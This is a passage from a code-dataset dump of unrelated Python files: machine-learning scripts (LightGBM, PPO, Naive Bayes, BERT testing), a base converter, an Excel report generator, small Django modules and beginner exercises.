'lgr_dropoff_distance_sphere',\n 'jfk_pickup_distance_bear',\n 'jfk_dropoff_distance_bear',\n 'ewr_pickup_distance_bear',\n 'ewr_dropoff_distance_bear',\n 'lgr_pickup_distance_bear',\n 'lgr_dropoff_distance_bear',\n 'downtown_pickup_distance_bear',\n 'downtown_dropoff_distance_bear',\n]\n\ntrain_df, validation_df = train_test_split(\n train, test_size=0.1, random_state=1)\n\none_hot_columns = [\n 'month', 'day', 'hour', 'weekday', 'night', 'late_night', 'year'\n]\n\ntarget = \"fare_amount\"\n\nparams = {\n 'learning_rate': 0.05,\n #'is_unbalance': 'true', # replaced with scale_pos_weight argument\n 'num_leaves': 31, # we should let it be smaller than 2^(max_depth)\n 'max_depth': -1, # -1 means no limit\n 'min_child_samples': 10,\n 'max_bin': 100, # Number of bucketed bin for feature values\n 'subsample': 0.7, # Subsample ratio of the training instance.\n 'subsample_freq': 1, # frequence of subsample, <=0 means no enable\n 'colsample_bytree':\n 0.7, # Subsample ratio of columns when constructing each tree.\n 'min_child_weight':\n 1, # Minimum sum of instance weight(hessian) needed in a child(leaf)\n 'min_split_gain': 0.5,\n}\n\nbst = lgb_modelfit_nocv(\n params,\n train_df,\n validation_df,\n wanted_columns + one_hot_columns,\n target,\n early_stopping_rounds=50,\n verbose_eval=True,\n num_boost_round=3000,\n categorical_features=one_hot_columns)\n\nprint(\"Features importance...\")\ngain = bst.feature_importance('gain')\nft = pd.DataFrame({\n 'feature': bst.feature_name(),\n 'split': bst.feature_importance('split'),\n 'gain': 100 * gain / gain.sum()\n}).sort_values(\n 'gain', ascending=False)\nprint(ft.head(100))\n","sub_path":"taxifare_lgbm.py","file_name":"taxifare_lgbm.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351187608","text":"import sys\nsys.path.append('../Models')\nfrom AtariModels import CNN\n\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nimport sys\n\nimport numpy as np\n\nclass PPO:\n\n def __init__(self, network, input_shape, output_shape, summary_writer):\n self.input_shape = input_shape\n self.output_shape = output_shape\n self.training_counter = 0\n self.learning_rate = 1e-3\n self.discount = .99\n self.LAMBDA = 1\n self.clip_range = .2\n self.summary_writer = summary_writer\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n self.session = tf.Session(config=config)\n K.set_session(self.session)\n K.manual_variable_initialization(True)\n self.input, self.value, self.policy, self.h_state, self.c_state, self.h_state_out, self.c_state_out, self.state_shape = CNN('PPO', input_shape, output_shape, network)\n self.buildLoss('PPO')\n self.session.run(tf.global_variables_initializer())\n self.default_graph = tf.get_default_graph()\n self.default_graph.finalize()\n\n def act(self, observation, h_state, c_state):\n with self.session.as_default():\n policy, value, h_state, c_state = self.session.run([self.policy, self.value, self.h_state_out, self.c_state_out], feed_dict = {\n self.input:np.array([observation]),\n self.h_state:np.array([h_state]),\n self.c_state:np.array([c_state])\n })\n policy = policy[0]\n return np.random.choice(len(policy), p=policy), value, h_state[0], c_state[0], policy\n\n def getValue(self, observation, h_state, c_state):\n with self.session.as_default():\n return self.session.run(self.value, feed_dict = {\n self.input:np.array([observation]),\n self.h_state:np.array([h_state]),\n self.c_state:np.array([c_state])\n })\n\n def buildLoss(self, variable_scope):\n with tf.variable_scope(variable_scope):\n self.action_selected = tf.placeholder(tf.float32, [None, self.output_shape[0]])\n self.target_value = tf.placeholder(tf.float32,[None])\n self.advantage = tf.placeholder(tf.float32, [None])\n self.old_prob = tf.placeholder(tf.float32, [None, self.output_shape[0]])\n # advantage = self.target_value - self.value\n action_probability = tf.reduce_sum(self.action_selected * self.policy, axis=1)\n old_action_probability = tf.reduce_sum(self.action_selected * self.old_prob, axis=1)\n log_prob = tf.log(action_probability + 1e-10)\n old_log_prob = tf.log(old_action_probability + 1e-10)\n\n ratio = tf.exp(log_prob - old_log_prob)\n clipped_ratio = tf.clip_by_value(ratio, 1 - self.clip_range, 1 + self.clip_range)\n policy_loss = -tf.minimum(ratio * self.advantage, clipped_ratio * self.advantage)\n\n value_loss = tf.square(self.target_value - self.value)\n\n entropy = tf.reduce_sum(self.policy * tf.log(self.policy + 1e-10), axis=-1)\n\n loss = tf.reduce_mean(policy_loss + .5 * value_loss + .01 * entropy)\n\n opt = tf.train.AdamOptimizer(self.learning_rate)\n\n grads, vars = zip(*opt.compute_gradients(loss))\n grads, glob_norm = tf.clip_by_global_norm(grads, 50.0)\n self.train_op = opt.apply_gradients(zip(grads, vars))\n\n summary = []\n summary.append(tf.summary.scalar(\n 'policy_loss', tf.reduce_mean(policy_loss)))\n summary.append(tf.summary.scalar(\n 'glob_norm', glob_norm))\n summary.append(tf.summary.scalar(\n 'value_loss', tf.reduce_mean(value_loss)))\n summary.append(tf.summary.scalar(\n 'entropy_loss', tf.reduce_mean(entropy)))\n summary.append(tf.summary.scalar(\n 'loss', tf.reduce_mean(loss)))\n\n self.summary_op = tf.summary.merge(summary)\n\n def updateModel(self, queue, epochs):\n\n feed = {}\n for batch in queue:\n if self.input not in feed:\n feed[self.input] = batch['observations']\n feed[self.target_value] = batch['rewards']\n feed[self.action_selected] = batch['action_selected']\n feed[self.h_state] = batch['h_state']\n feed[self.c_state] = batch['c_state']\n feed[self.advantage] = batch['advantage']\n feed[self.old_prob] = batch['old_prob']\n else:\n feed[self.input] = np.concatenate((feed[self.input], batch['observations']))\n feed[self.target_value]= np.concatenate((feed[self.target_value], batch['rewards']))\n feed[self.action_selected] = np.concatenate((feed[self.action_selected],batch['action_selected']))\n feed[self.h_state] = np.concatenate((feed[self.h_state],batch['h_state']))\n feed[self.c_state] = np.concatenate((feed[self.c_state],batch['c_state']))\n feed[self.advantage] = np.concatenate((feed[self.advantage], batch['advantage']))\n feed[self.old_prob] = np.concatenate((feed[self.old_prob], batch['old_prob']))\n\n for _ in range(epochs):\n _, summary = self.session.run([self.train_op,self.summary_op], feed_dict = feed)\n self.training_counter += 1\n self.summary_writer.add_summary(summary, self.training_counter)\n self.summary_writer.flush()\n","sub_path":"PPO/PPO.py","file_name":"PPO.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560803563","text":"#!/bin/python3.6\n#\n# This program is intended for translate numbers from system\n# with one base to system with other base. Range of bases is\n# from 2 to 16.\n#\n# b1 - base of first system\n# b2 - base of second system\n# n - number in first system\n\n# This function is intended for printing error message if number is out of range of system\n\ndef attention():\n print(\"This number is out of range of this system!\")\n\n# This function is intended for translate numbers from decimal system to other system\n\ndef dec_to_num(n, b2):\n n = int(n)\n if n == 0:\n return 0\n else:\n b2 = int(b2)\n result = ''\n dec_to_hex_dict = {'10':'A', '11':'B', '12':'C', '13':'D', '14':'E', '15':'F'} # Mapping decimal numbers to hexadecimal numbers\n # Algorithm for translate from decimal system to other system\n while n != 0:\n if n % b2 == 0:\n result += '0'\n n = n // b2\n else:\n num = str(n - ((n // b2) * b2))\n if 10 <= int(num) <= 16: # If number, which we get as a result of dividing, is in a range from 10 to 16, then\n result += dec_to_hex_dict.get(num)\n else:\n result += num\n n = n // b2\n return result[::-1]\n\n# This function is intended for translate numbers from some system to decimal system\n\ndef num_to_dec(n, b1):\n num_error = 0\n b1 = int(b1)\n n = str(n)\n result = 0\n hex_to_dec_dict= {'A':'10', 'B':'11', 'C':'12', 'D':'13', 'E':'14', 'F':'15'} # Mapping hexadecimal numbers to decimal numbers\n for i in range(len(n)):\n if n[i].isalpha(): # Checking that symbol is a letter\n if n[i] in hex_to_dec_dict.keys(): # If letter is inside the list, then\n result += int(hex_to_dec_dict.get(n[i])) * (b1 ** (len(n) - (i + 1)))\n else: # If letter is not inside the list, then\n num_error += 1\n else: # If symbol is not a letter\n if int(n[i]) >= b1: # If number is greater than or equal it's base of system, then\n num_error += 1\n else:\n result += int(n[i]) * (b1 ** (len(n) - (i + 1)))\n if num_error > 0: # If number of errors is greater than 0, then\n attention()\n return 0\n else: # If numbers of errors is equal 0, then\n return result\n\ninp_data = input(\"Enter sequence b1,b2,n: \").split(\",\")\n\nif inp_data[0] < inp_data[1]: # If base1 < base2, then\n result = num_to_dec(inp_data[2], inp_data[0])\n result = dec_to_num(result, inp_data[1])\nelif inp_data[0] > inp_data[1]: # If base1 > base2, then\n result = num_to_dec(inp_data[2], inp_data[0])\n result = dec_to_num(result, inp_data[1])\nelif inp_data[0] == inp_data[1]: # If base1 = base2, then\n result = inp_data[2]\n\nif result == 0:\n pass\nelse:\n print(result)\n","sub_path":"num1-to-num2.py","file_name":"num1-to-num2.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475111658","text":"# Conway Hsieh\r\n# 10-601 Naive Bayes\r\n# 11/23/2018\r\n\r\n# import libraries\r\nimport re, collections, sys, math, string, pprint, numpy as np\r\n\r\npp = pprint.PrettyPrinter(indent=4)\r\n\r\n#filename is input 1\r\ntrainFileName = sys.argv[1]\r\ntestFileName = sys.argv[2]\r\nq = float(sys.argv[3])\r\n\r\n#create list to store train file names\r\nwith open(trainFileName,\"r\") as f:\r\n trainFiles = f.readlines()\r\nwith open(testFileName, \"r\") as f:\r\n\ttestFiles = f.readlines()\r\n\r\n# strip \\n\r\ntrainFiles = [x.strip() for x in trainFiles] \r\ntestFiles = [x.strip() for x in testFiles]\r\n\r\n#pp.pprint(trainFiles)\r\n\r\nlibWordCounter = collections.Counter()\r\nconWordCounter = collections.Counter()\r\nmasterWordCounter = collections.Counter()\r\nmasterWordList = list()\r\nnumLib = 0\r\nnumCon = 0\r\nsizeLibText = 0\r\nsizeConText = 0\r\nfor numFile in range(len(trainFiles)):\r\n\t# read in all words as lower case \r\n\twords = re.findall(r'[A-Za-z\\']+(?:\\`[A-Za-z]+)?', \\\r\n\t\topen(trainFiles[numFile], encoding=\"latin-1\").read().lower())\r\n\t# create counter based on current doc\r\n\twordCount = collections.Counter(words)\r\n\r\n\tmasterWordCounter += wordCount\r\n\t\r\n\t# append list of all words in current document to master list\r\n\tmasterWordList.append(words)\r\n\r\n\t# add counters to respective counter obj\r\n\tif re.match('^lib',trainFiles[numFile]):\r\n\t\tlibWordCounter += wordCount\r\n\t\tnumLib += 1\r\n\t\tsizeLibText += len(words)\r\n\telse:\r\n\t\tconWordCounter += wordCount\r\n\t\tnumCon += 1\r\n\t\tsizeConText += len(words)\r\n\r\nnumTexts = numLib + numCon\r\npLib = numLib/numTexts\r\npCon = numCon/numTexts\r\n\r\n# flatten list to 1D\r\nmasterWordList = [item for sublist in masterWordList for item in sublist]\r\ntotalWords = len(masterWordList)\r\n\r\n# create list of unique words from all training texts\r\nmasterWordSet = list(set(masterWordList))\r\nnumUniqueWords = len(masterWordSet)\r\n\r\n#print(totalWords)\r\n#print(numUniqueWords)\r\n\r\n# start testing\r\nnumCorrect = 0\r\n#print(testFiles)\r\nfor numFile in range(len(testFiles)):\r\n\twords = re.findall(r'[A-Za-z\\']+(?:\\`[A-Za-z]+)?', \\\r\n\t\topen(testFiles[numFile], encoding=\"latin-1\").read().lower())\r\n\t#print(testFiles[numFile])\r\n\t# create counter based on current doc\r\n\twordCount = collections.Counter(words)\r\n\t# create list of only all words in current doc\r\n\r\n\tcurrPLib = math.log(pLib)\r\n\tcurrPCon = math.log(pCon)\r\n\r\n\t#print(pLib)\r\n\t#print(currPLib)\r\n\t#print(currPCon)\r\n\r\n\t# for each word\r\n\tfor word in range(len(words)):\r\n\t\tif masterWordCounter[words[word]] == 0:\r\n\t\t\tcontinue\r\n\t\t#print(words[word])\r\n\t\tnumLibOcc = libWordCounter[words[word]]\r\n\t\tnumConOcc = conWordCounter[words[word]]\r\n\t\t#print(numLibOcc)\r\n\t\t#print(numConOcc)\r\n\r\n\t\ttry:\r\n\t\t\tcurrPLib += math.log((numLibOcc + q)/(sizeLibText + q*numUniqueWords))\r\n\t\t\tcurrPCon += math.log((numConOcc + q)/(sizeConText + q*numUniqueWords))\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\t#print(currPLib)\r\n\t\t#print(currPCon)\r\n\r\n\t#currPLib = abs(currPLib)\r\n\t#currPCon = abs(currPCon)\r\n\t#print(currPLib)\r\n\t#print(currPCon)\r\n\tif currPLib >= currPCon:\r\n\t\tlib = True\r\n\t\tprint('L')\r\n\telse:\r\n\t\tlib = False\r\n\t\tprint('C')\r\n\r\n\tif re.match('^lib',testFiles[numFile]):\r\n\t\tisLib = True\r\n\telse:\r\n\t\tisLib = False\r\n\t#print(isLib)\r\n\r\n\tif isLib == lib:\r\n\t\tnumCorrect += 1\r\n\r\nprint('Accuracy: {:.04f}'.format(numCorrect/len(testFiles)))\r\n","sub_path":"HW9/smoothing.py","file_name":"smoothing.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176090437","text":"#!/usr/bin/env python3\n\n# Tip: look at day 7, intcode.py for a general intcode machine.\n\narr = []\n\nfor i in map(int, input('').split(',')):\n arr.append(i)\n\narr[1] = 12\narr[2] = 2\n\npc = 0\nop = 0\nwhile op != 99:\n op = arr[pc]\n if op == 99:\n #print(arr)\n print(arr[0])\n exit(0)\n pc += 1\n a, b, c = arr[pc : pc + 3]\n pc += 3\n if op == 1:\n res = arr[a] + arr[b]\n elif op == 2:\n res = arr[a] * arr[b]\n else:\n print('illegal op %d at pos %d' % op, pc - 4)\n exit(1)\n arr[c] = res\n","sub_path":"02/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341347937","text":"import sys, time, datetime, openpyxl\nfrom lxml import etree\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib\nimport xlrd\nfrom openpyxl.styles import *\nfrom openpyxl.cell import Cell\nfrom openpyxl.chart import (PieChart, LineChart, ProjectedPieChart, Reference)\nfrom openpyxl.chart.series import DataPoint\nfrom decimal import *\nfrom pylab import title, figure, xlabel, ylabel, xticks, bar, legend, axis, savefig\n\nfrom db_module import *\nfrom kpi_module import *\nfrom report_abstract import *\n\n\nclass Multi_Validation_Report(Report): # 다중노드의 경우 validation report는 이쪽으로 들어온다.\n ana_tag: str\n user_id: str\n start_dt: str\n end_dt: str\n file_name: str\n count: int\n div: str\n dbmodule: object\n kpimodule: object\n\n def __init__(self, ana_tag, user_id, start_dt, end_dt, file_name, div, bottle_tag=None):\n self.ana_tag = ana_tag\n self.user_id = user_id\n self.start_dt = start_dt\n self.end_dt = end_dt\n self.file_name = file_name\n self.div = div\n self.bottle_tag = bottle_tag\n self.dbmodule = withDB()\n self.taggs = self.dbmodule.selectValidationTagByTag(ana_tag)\n self.count = len(self.taggs)\n\n self.dbmodule = withDB()\n self.kpimodule = KPI_module(start_dt, end_dt, div, ana_tag)\n\n def basic_inform_cell(self, ws: object, start_idx: int, end_idx: int, title: list, value: list, style: object): # 셀 그리는 기능\n for i in range(start_idx, end_idx):\n ws.merge_cells('F' + str(i) + ':G' + str(i))\n ws = self.cell_method(ws, 'F' + str(i), title[i - start_idx], 11, True)\n ws.merge_cells('H' + str(i) + ':I' + str(i))\n ws = self.cell_method(ws, 'H' + str(i), value[i - start_idx], 11)\n ws['F' + str(i)].border, ws['G' + str(i)].border, ws['H' + str(i)].border, ws[\n 'I' + str(i)].border = style, style, style, style\n return ws\n\n def data_preprocess(self, datas: list, div: str): # validation 데이터를 가져와서 list별로 분류하는 기능.\n v_type, validation_value, start_time, check_time, result, user_id = [], [], [], [], [], []\n for i in range(0, self.count):\n v_type.append([])\n validation_value.append([]) # 3개 라면 [[],[],[]] 로 처음 배열 생성.\n start_time.append([])\n check_time.append([])\n result.append([])\n user_id.append([])\n for j in range(0, self.count):\n for k in range(0, len(datas)):\n if datas[k][0] == self.taggs[j][0]:\n v_type[j].append(datas[k][1])\n validation_value[j].append(round(float(datas[k][2]), 2))\n start_time[j].append(str(datas[k][3])[2:16])\n check_time[j].append(str(datas[k][4])[2:16])\n result[j].append(datas[k][5])\n user_id[j].append(datas[k][6])\n return (v_type, validation_value, start_time, check_time, result, user_id)\n\n def data_array(self, ws: object, div: str, datas: list, linestyle: object, fillstyle: object): # data를 반복문을 이용해서 파일에 쓴다.\n preprocessing_data = self.data_preprocess(datas, div)\n v_type, validation_value, start_time, check_time, result, user_id = preprocessing_data[0], preprocessing_data[\n 1], preprocessing_data[2], preprocessing_data[3], preprocessing_data[4], preprocessing_data[5]\n row = len(validation_value[0]) # 태그 하나의 갯수가 곧 row줄 갯수가 된다.\n col_num = len(validation_value) # 태그 갯수가 곧 column에 몇 개 추가 되어야 하는지를 나타낸다.\n cell_char = ['C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',\n 'W', 'X', 'Y', 'Z']\n\n for i in range(35, 35 + row):\n if i % 2 == 0:\n ws = self.cell_method(ws, 'A' + str(i), str(i - 35), 11)\n ws = self.cell_method(ws, 'B' + str(i), v_type[0][i - 35], 11)\n for k in range(0, col_num):\n ws = self.cell_method(ws, cell_char[k] + str(i), validation_value[k][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num] + str(i), start_time[0][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num + 1] + str(i), check_time[0][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num + 2] + str(i), result[0][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num + 3] + str(i), user_id[0][i - 35], 11)\n\n ws['A' + str(i)].fill, ws['B' + str(i)].fill = fillstyle, fillstyle\n for m in range(1, col_num + 5):\n ws[cell_char[m - 1] + str(i)].fill = fillstyle\n else:\n ws = self.cell_method(ws, 'A' + str(i), str(i - 35), 11)\n ws = self.cell_method(ws, 'B' + str(i), v_type[0][i - 35], 11)\n for k in range(0, col_num):\n ws = self.cell_method(ws, cell_char[k] + str(i), validation_value[k][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num] + str(i), start_time[0][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num + 1] + str(i), check_time[0][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num + 2] + str(i), result[0][i - 35], 11)\n ws = self.cell_method(ws, cell_char[col_num + 3] + str(i), user_id[0][i - 35], 11)\n ws['A' + str(i)].border, ws['B' + str(i)].border = linestyle, linestyle\n for m in range(1, col_num + 5):\n ws[cell_char[m - 1] + str(i)].border = linestyle\n return ws\n\n def column_cell(self, ws: object, div: str, style: object): # data에 해당되는 column을 파일에 쓴다.\n valid_tag = self.taggs # (('1630AI355A-VV',), ('1630AI355B-VV',), ('1630AI355C-VV',))\n columns = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',\n 'U', 'V', 'W', 'X', 'Y', 'Z']\n column_name = []\n width_no = []\n if div == \"Validation\":\n column_width = [5, 10, 15, 15, 10, 10]\n fixed_column_name = ['no', 'Type', 'Start Date', 'Check Date', 'Result', 'User']\n for i in range(0, 2 + len(valid_tag)):\n if i < 2:\n column_name.append(fixed_column_name[i])\n width_no.append(column_width[i])\n else:\n column_name.append(valid_tag[i - 2][0])\n width_no.append(15)\n for k in range(2 + len(valid_tag), len(valid_tag) + 6):\n column_name.append(fixed_column_name[k - len(valid_tag)])\n width_no.append(column_width[k - len(valid_tag)])\n\n elif div == \"Trend\":\n column_width = [5, 15, 15]\n fixed_column_name = ['no', 'Start Date', 'Check Date']\n for i in range(0, 1 + len(valid_tag)):\n if i < 1:\n column_name.append(fixed_column_name[i])\n width_no.append(column_width[i])\n else:\n column_name.append(valid_tag[i - 1][0])\n width_no.append(15)\n for k in range(1 + len(valid_tag), 3 + len(valid_tag)):\n column_name.append(fixed_column_name[k - len(valid_tag)])\n width_no.append(column_width[k - len(valid_tag)])\n for i in range(0, len(column_name)):\n ws[columns[i] + '34'] = column_name[i]\n ws[columns[i] + '34'].font = Font(name=\"맑은 고딕\", size=11, bold=True)\n ws[columns[i] + '34'].alignment = Alignment(horizontal='center', vertical='center')\n ws[columns[i] + '34'].border = style\n ws.column_dimensions[columns[i]].width = width_no[i]\n return ws\n\n def kpi_chart(self, ws: object): # KPI 차트를\n chart = PieChart()\n label_min_col = 3\n data_min_col = 5\n labels = Reference(ws, min_col=(label_min_col + self.count), min_row=12, max_row=14) # 이 셀에 써진 값이 label로 나타난다.\n data = Reference(ws, min_col=(data_min_col + self.count), min_row=12, max_row=14) # 이 셀에 써진 값이 pie로 나타난다.\n chart.add_data(data)\n chart.set_categories(labels)\n chart.title = \"KEY PERFORMANCE CHART\"\n chart.height = 6.8\n chart.width = 11\n slice = DataPoint(idx=0, explosion=5)\n chart.series[0].data_points = [slice]\n ws.add_chart(chart, \"B7\")\n return ws\n\n def trend_chart(self, ws: object, length: int):\n chart = LineChart()\n data_max_col = 2\n P_datas = Reference(ws, min_col=3, min_row=35, max_col=(data_max_col + self.count),\n max_row=34 + int(length / self.count)) # 이 셀에 써진 값이 트렌드 그래프로 나타난다.\n chart.add_data(P_datas)\n chart.title = \"VALUE TREND\"\n chart.height = 6.8\n chart.width = 21\n ws.add_chart(chart, \"A20\")\n return ws\n\n def make_excel_report(self):\n house_tag = self.dbmodule.selectHousetagByAnalyzertag(self.ana_tag)\n datas = self.dbmodule.dataForReport(self.start_dt, self.end_dt, self.div, self.ana_tag)\n\n (headerFill, header2Fill, tableFill, thin_border, top_bottom_border) = self.design_for_report() # 셀 디자인만 가져온다.\n (availability_rate, check_rate, break_rate) = self.kpimodule.calculate_kpi() # 각종 필요한 kpi요소\n reproducibility_rate = self.kpimodule.calculate_reproducibility(self.ana_tag, self.start_dt, self.end_dt,\n self.bottle_tag) # 재현성 값\n (mtbf, mttr, mttf) = self.kpimodule.calculate_mean_break_time() # 필요한 mtbf요소\n\n write_wb = openpyxl.Workbook()\n ws = write_wb.active\n\n ws.merge_cells('A1:G4')\n ws['A1'].fill = headerFill\n ws = self.title_cell(ws, self.div, \"TITLE\")\n\n ws.merge_cells('H1:I2')\n ws['H1'].fill = header2Fill\n ws = self.cell_method(ws, 'H1', 'AMADAS', 11)\n\n ws.merge_cells('A5:E6')\n ws = self.cell_method(ws, 'A5', 'PERFORMANCE HISTORY CHART', 11, True)\n\n label = ['House', 'Analyzer', 'Period Start', 'Period End', 'Operator']\n value = [house_tag, self.ana_tag, self.start_dt, self.end_dt, self.user_id]\n ws = self.basic_inform_cell(ws, 5, 10, label, value, thin_border)\n\n rate = ['Availability Rate', 'Checking Rate', 'Breakdown Rate', 'Reproducibility',\n 'MTBF', 'MTTF', 'MTTR']\n values = [round(float(availability_rate), 2), round(float(check_rate), 2), round(float(break_rate), 2),\n round(float(reproducibility_rate), 2),\n round(float(mtbf), 2), round(float(mttf), 2), round(float(mttr), 2)]\n\n ws = self.basic_inform_cell(ws, 12, 18, rate, values, thin_border)\n\n cell_char = ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X']\n for i in range(1, 18):\n if self.count == i:\n ws.merge_cells('A32:' + cell_char[i] + '33')\n ws = self.data_array(ws, self.div, datas, top_bottom_border, tableFill)\n break\n else:\n pass\n\n ws = self.title_cell(ws, self.div, \"VALUE\")\n ws = self.column_cell(ws, self.div, top_bottom_border)\n\n ws = self.kpi_chart(ws)\n ws = self.trend_chart(ws, len(datas))\n\n print(\"정상 출력\")\n write_wb.save(self.file_path() + self.file_name + \".xlsx\") # 최종 파일 생성\n return \"OK\"","sub_path":"multi_validation_report.py","file_name":"multi_validation_report.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287098147","text":"from django.http import HttpResponse\nfrom django.utils import simplejson as json\nelement_handlers_registry ={}\n\ndef register_element_update_handler(handler_type, handler):\n element_handlers_registry[handler_type] = handler\n\ndef element_update_dispatcher(request):\n message_list = json.loads(request.raw_post_data)\n response = {\"new_elements\":[],\"update_data\":{}}\n for element_id in message_list.iterkeys():\n message = message_list[element_id]\n element_type_handler=element_handlers_registry[message[\"type\"]]\n new_elements, update_data = element_type_handler(element_id,message[\"data\"])\n for new_element in new_elements:\n response[\"new_elements\"].append(new_element.to_context_map())\n response[\"update_data\"][element_id] = update_data\n return HttpResponse(json.dumps(response), content_type='application/json')\n\naction_handlers_registry = {}\n\ndef register_action_handler(action_id,handler):\n action_handlers_registry[action_id] = handler\n\ndef action_dispatcher(request):\n request_data = json.loads(request.raw_post_data)\n response = action_handlers_registry[request_data[\"id\"]](**request_data[\"arguments\"])\n return HttpResponse(json.dumps(response), content_type='application/json')","sub_path":"jabberwocky/ria.py","file_name":"ria.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"104623192","text":"# Напишете програма която пресмята колко пари ще изкара шофьор на ТИР за един сезон.\n# На входа програмата получава през кой сезон ще работи шофьора, както и колко километра на месец ще кара.\n# Един сезон е 4 месеца. Според зависи сезона и броя километри на месец ще му се заплаща различна сума на километър:\n# Изход\n# На конзолата трябва да се отпечатат едно число:\n# •\tЗаплатата на шофьора след данъците, форматирана до втория знак след десетичната запетая.\n\nseason = input() # – Сезон – текст \"Spring\", \"Summer\", \"Autumn\" или \"Winter\"\nkm_per_month = float(input()) # – Километри на месец – реално число\nprice_per_km = 0\ntax = 0.9\nif km_per_month <= 5000:\n if season == \"Spring\" or season == \"Autumn\":\n price_per_km = 0.75\n elif season == \"Summer\":\n price_per_km = 0.90\n elif season == \"Winter\":\n price_per_km = 1.05\nelif 5000 < km_per_month <= 10000:\n if season == \"Spring\" or season == \"Autumn\":\n price_per_km = 0.95\n elif season == \"Summer\":\n price_per_km = 1.1\n elif season == \"Winter\":\n price_per_km = 1.25\nelif 10000 < km_per_month <= 20000:\n price_per_km = 1.45\nsalary = (price_per_km * km_per_month * 4) * tax\nprint(f\"{salary:.2f}\")","sub_path":"Python Basics June 2020/3 conditional_statements_more_ex/3.3.6. truck_driver.py","file_name":"3.3.6. truck_driver.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"352613271","text":"from django.db import models\n\n\nclass Program(models.Model):\n name = models.CharField(max_length=255)\n\n class Meta:\n ordering = ['-id']\n db_table = 'programs'\n\n\nclass Version(models.Model):\n name = models.CharField(max_length=255)\n program = models.ForeignKey(Program, on_delete=models.CASCADE, related_name='versions')\n\n class Meta:\n ordering = ['-id']\n db_table = 'program_versions'\n unique_together = ('name', 'program',)\n","sub_path":"bughound_api/programs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387291005","text":"# -*- coding: utf-8 -*-\n\n\nimport torch\nfrom sys import platform\nfrom torch.utils.data import DataLoader\nfrom transformers import BertTokenizer\nfrom model import BertModelTest\nfrom utils import test\nfrom data import DataPrecessForSentence\n\ndef main(test_file, pretrained_file, batch_size=32):\n\n device = torch.device(\"cuda\")\n bert_tokenizer = BertTokenizer.from_pretrained('bert-base-chinese', do_lower_case=True)\n print(20 * \"=\", \" Preparing for testing \", 20 * \"=\")\n if platform == \"linux\" or platform == \"linux2\":\n checkpoint = torch.load(pretrained_file)\n else:\n checkpoint = torch.load(pretrained_file, map_location=device)\n # Retrieving model parameters from checkpoint.\n print(\"\\t* Loading test data...\") \n test_data = DataPrecessForSentence(bert_tokenizer, test_file)\n test_loader = DataLoader(test_data, shuffle=True, batch_size=batch_size)\n print(\"\\t* Building model...\")\n model = BertModelTest().to(device)\n model.load_state_dict(checkpoint[\"model\"])\n print(20 * \"=\", \" Testing BERT model on device: {} \".format(device), 20 * \"=\")\n batch_time, total_time, accuracy, auc = test(model, test_loader)\n print(\"\\n-> Average batch processing time: {:.4f}s, total test time: {:.4f}s, accuracy: {:.4f}%, auc: {:.4f}\\n\".format(batch_time, total_time, (accuracy*100), auc))\n\n\nif __name__ == \"__main__\":\n main(\"../data/LCQMC_dev.csv\", \"models/best.pth.tar\")","sub_path":"AI-assists/Bert/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644114473","text":"import pandas as pd\nimport numpy as np\nimport math\nimport datetime\nfrom datetime import timedelta\nimport sqlite3\nimport re\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport warnings\nimport pytz\nimport pickle\nimport nltk\nimport en_core_web_sm\n\nfrom matplotlib import pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.python.keras.preprocessing.text import Tokenizer\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, GRU\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow import pad\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.manifold import TSNE\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.naive_bayes import MultinomialNB, BernoulliNB\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom 